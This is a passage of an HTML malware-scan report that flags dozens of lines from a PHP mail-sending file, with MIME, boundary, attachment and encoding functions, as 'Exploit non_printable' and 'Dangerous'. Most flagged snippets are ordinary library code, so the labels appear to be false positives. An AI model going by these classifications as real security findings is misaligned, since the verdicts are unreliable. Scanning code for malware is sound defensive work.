<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2840</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
